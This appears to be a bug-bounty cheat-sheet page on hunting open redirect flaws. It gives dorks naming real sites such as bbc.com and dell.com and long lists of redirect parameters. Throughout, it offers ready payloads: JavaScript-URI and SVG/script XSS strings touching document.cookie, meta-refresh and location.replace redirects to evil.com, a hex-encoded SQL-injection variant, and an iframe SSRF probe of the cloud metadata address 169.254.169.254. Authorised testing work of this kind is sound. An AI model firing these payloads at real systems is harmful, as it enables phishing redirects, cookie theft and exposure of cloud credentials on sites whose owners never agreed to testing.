👑Find Open Redirect (CWE-601)

Open Redirect Payload Cheatsheet:

https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet

---------------------------------------------------------------

Start Hunt Open Redirect:

site:*.bbc.com inurl:register
inurl:register | intitle:register | inurl:signup | intitle:signup site:dell.com

---------------------------------------------------------------

Open Redirect Most Working Payloads:

?Redirect=https://vulnerabledomain.com.bing.com/

---------------------------------------------------------------

Open Redirect to XSS

redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
redirectUrl=javascript:top[/al/.source+/ert/.source](document.cookie)
redirectUrl=javascript:confirm(document.cookie)
redirectUrl=<>javascript:alert(origin);

HTML injection to Open Redirect

"><meta http-equiv="Refresh" content="0; url='https://evil.com'"/>

HTML injection to SSRF

<html><head><title>test</title></head><body><iframe width=500 height=500 src="http://169.254.169.254/latest/meta-data/ami-id/"></iframe></body></html>

XSS to Open Redirect

'"><svg/onload="location.replace('https://evil.com')"
<script>document.location.href="https://evil.com/"</script>
<k AutoFocus contenteditable OnFocus="location.replace('https://evil.com')">

SQLI to Open Redirect


0x27223E3C7376672F6F6E6C6F61643D226C6F636174696F6E2E7265706C616365282768747470733A2F2F6576696C2E636F6D272922
0x3C7376672F6F6E6C6F61643D226C6F636174696F6E2E7265706C616365282768747470733A2F2F6F70656E627567626F756E74792E6F7267272922

OpenRedirect Dorking

inurl:redir site:http://example.com
inurl:redirect site:http://example.com
inurl:redirecturi site:http://example.com
inurl:redirect_uri site:http://example.com
inurl:redirecturl site:http://example.com
inurl:redirect_uri site:http://example.com
inurl:return site:http://example.com
inurl:returnurl site:http://example.com
inurl:relaystate site:http://example.com
inurl:forward site:http://example.com
inurl:forwardurl site:http://example.com
inurl:forward_url site:http://example.com
inurl:url site:http://example.com
inurl:uri site:http://example.com
inurl:dest site:http://example.com
inurl:destination site:http://example.com
inurl:next site:http://example.com

PreviousFind HTML Injection (CWE-79)NextFind Stored - XSS (CWE-79)

Last updated 1 year ago

Open Redirect Payload Cheatsheet:

---------------------------------------------------------------

Start Hunt Open Redirect:

Check Open Redirect vulnerability in signup Login and logout URL

---------------------------------------------------------------

Open Redirect Most Working Payloads:

---------------------------------------------------------------

Open Redirect to XSS

HTML injection to Open Redirect

HTML injection to SSRF

XSS to Open Redirect

SQLI to Open Redirect

OpenRedirect Dorking